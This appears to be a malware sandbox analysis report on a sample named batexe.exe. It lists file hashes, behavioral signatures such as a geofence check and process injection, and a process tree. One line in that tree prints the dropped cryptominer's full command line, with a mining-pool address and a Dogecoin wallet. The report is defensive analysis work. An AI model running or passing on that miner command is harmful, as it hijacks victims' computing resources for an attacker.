Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
296s -
max time network
295s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-ja -
resource tags
arch:x64arch:x86image:win10v2004-20231215-jalocale:ja-jpos:windows10-2004-x64systemwindows -
submitted
20/02/2024, 17:04
Behavioral task
behavioral1
Sample
batexe.exe
Resource
win10-20240214-ja
Behavioral task
behavioral2
Sample
batexe.exe
Resource
win10v2004-20231215-ja
General
-
Target
batexe.exe
-
Size
9.4MB
-
MD5
cdc9eacffc6d2bf43153815043064427
-
SHA1
d05101f265f6ea87e18793ab0071f5c99edf363f
-
SHA256
73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
-
SHA512
fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
-
SSDEEP
196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000\Control Panel\International\Geo\Nation batexe.exe Key value queried \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000\Control Panel\International\Geo\Nation b2e.exe -
Executes dropped EXE 2 IoCs
pid Process 1156 b2e.exe 932 cpuminer-sse2.exe -
Loads dropped DLL 5 IoCs
pid Process 932 cpuminer-sse2.exe 932 cpuminer-sse2.exe 932 cpuminer-sse2.exe 932 cpuminer-sse2.exe 932 cpuminer-sse2.exe -
resource yara_rule behavioral2/memory/5076-9-0x0000000000400000-0x000000000393A000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 5076 wrote to memory of 1156 5076 batexe.exe 83 PID 5076 wrote to memory of 1156 5076 batexe.exe 83 PID 5076 wrote to memory of 1156 5076 batexe.exe 83 PID 1156 wrote to memory of 2324 1156 b2e.exe 84 PID 1156 wrote to memory of 2324 1156 b2e.exe 84 PID 1156 wrote to memory of 2324 1156 b2e.exe 84 PID 2324 wrote to memory of 932 2324 cmd.exe 87 PID 2324 wrote to memory of 932 2324 cmd.exe 87
Processes
-
C:\Users\Admin\AppData\Local\Temp\batexe.exe"C:\Users\Admin\AppData\Local\Temp\batexe.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:5076 -
C:\Users\Admin\AppData\Local\Temp\8DA9.tmp\b2e.exe"C:\Users\Admin\AppData\Local\Temp\8DA9.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\8DA9.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1156 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\9376.tmp\batchfile.bat" "3⤵
- Suspicious use of WriteProcessMemory
PID:2324 -
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.execpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 34⤵
- Executes dropped EXE
- Loads dropped DLL
PID:932
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3.2MB
MD571aa42cebff4e993ec7b77dfd341ae44
SHA1c1125aa537967e1cd923efe092508ed26865de6e
SHA256822eee2c190b34270b70ccc88743128c306fa3c90e1d5e0c398ae2eda7aee98f
SHA5124c4288ed065abc47074f339ba46280a754933d66831437937d9547a995bc7ccd9320f6c8c2d329d94357aab833199203319526c5a2cb9b01c3a32059028ee029
-
Filesize
892KB
MD5fb072a34bcf57be20b10ca75eec87faf
SHA1884c5c611374aba6d98334e78725c9dd646f8fc7
SHA2563f71eff4e71b3c423615a065aa4530c879c3d1a62a3279cc32fbe846c9f5871a
SHA5125ef15af1c84eb8f797156296f4eb99f4cbb6bf500ceea3fa625c18043a2ee099abe171fa24c0d5d6c33aa117162e14d6413693b16307c2f81ce53fa1d7746154
-
Filesize
574KB
MD5ffa7af0a66b4210873d3d7ea7c31c9d1
SHA1d1b7c4d166ca859d183f723891d241f79441aaf6
SHA2561e6f72dbe9d93ca85f7b4aaa7c132dfd1dd39f74da54b55f88ad72abe8416aee
SHA5123ade1989316b360aca0d5b41181ebfa16f14704f62c4ed3229462e29c1cffd7e0efa84c476f714e9aa9a895249a32e605d9baff93aa2a0495215bef2a92d98a7
-
Filesize
136B
MD58ea7ac72a10251ecfb42ef4a88bd330a
SHA1c30f6af73a42c0cc89bd20fe95f9159d6f0756c5
SHA25665e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9
SHA512a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0
-
Filesize
1.7MB
MD57c09fbde105a3e357bc87b07b5a4c1b0
SHA1d226acd89ff609679a85af08931297c9bc365865
SHA256326c45df9afbebe4fff130ea3ecc31af310ce1e6f2b2109c7127cdc04db7f4e7
SHA512a7a182112a73e4c8f17fbdf19dfa9402b467b835e07aa7c298a75f92112860e5867b9ef3b686a62cd6039e7a74031db98445d13ec314d9e2f0b9ad8009855e1d
-
Filesize
1.2MB
MD5c1d5eb75584f2d964a93d4cfa407e5c5
SHA1f23aedf304a02389abb40ba77c7346f478f2067e
SHA256ee017b9dca4bf0448976065e41566d6027912617b744cf87463e2b6e935c5ed3
SHA51259f3beadec8476a44fd65d5a94799febd0c2302ed368f17aceece26f7caa30e81070bed5e9e7bf6ab0aa758b55537073a027515f42bf73c3852b62ee6516fb73
-
Filesize
836KB
MD5aeab40ed9a8e627ea7cefc1f5cf9bf7a
SHA15e2e8ca2881b9bf9edfa3c4fdcec6da1efa102d8
SHA256218cfc4073bab4eddf0de0804f96b204687311e20a9e97994bff54c9b0e01ee9
SHA512c0a67616fa01fdc351015212a718faf70da6612fbb3ec13da28dd7af9a507c56882fb7c3eea6fbc37d4d63b970157199d16d0756dbe3cb3bc2223e215cb104d8
-
Filesize
1.2MB
MD57cf672bee2afba2dcd0c031ff985958e
SHA16b82a205db080ffdcb4a4470fce85a14413f3217
SHA256c82f84171b9246d1cac261100b2199789c96c37b03b375f33b2c72afab060b05
SHA5123e90d1c1efe0200cb3cc7b51d04783a3cce8391faa6ce554cff8b23dac60be9f8e4f980a8ac005fd9dff8ea4bdcb02311f7649c5be28eb32dcc26417fc4090e5
-
Filesize
1.3MB
MD5ba251db4b9b8eddded9f8f71b19d6d63
SHA15ab294ea16e678d3d3795f6cc1cdf72a00feb479
SHA2569059d257ccd25071fb1b0008a46e99a924ad2c7e3bb0bbe276b809a07d04da2d
SHA512d27c8e754ab42b8d22ccc24f016b226949617fcf5c66f072bfaa357d0694a2bfc5d6d172e6015a607a292cda76e99fec7ecb0131e78ac37dbd79add4790b24c6
-
Filesize
1.1MB
MD5b43d39d823baf68c9d0d0159a05611a1
SHA17281e8e19646be5c55e21eb76e9c652bb3376fb7
SHA2569595138125704d233e4c44f2199397d59ee6bf7cb5e65868de2365e9525eb05a
SHA512d9f27aa9cc7024a62d61c67d8a0e253932972feadcc1273f6e1dee2b6ca6636e1d44219a8d4bb12be61788d359c1a82affa45501a719833cd0abc2f249a9f6d9
-
Filesize
1.2MB
MD502e6292498d6500e45c64ca3728a88c4
SHA1a4156bff916461e1954aecf0a13524490df7be4b
SHA256228b3b09a89de9fc33554c4119b04534d08ead26fbdd1cbd9f97ec85df48c6d0
SHA512bf5d90b5ac7189503fc1168ea3ff1fa2831d5de7c69a2b1deca2e7fb2697d77be99c4ada426c90ada7ea7750343b274f23fdacc4b6cb88852fa0893d75159cf3
-
Filesize
606KB
MD5585efec1bc1d4d916a4402c9875dff75
SHA1d209613666ccac9d0ddab29a3bc59aa00a0968fa
SHA2562f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232
SHA512b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770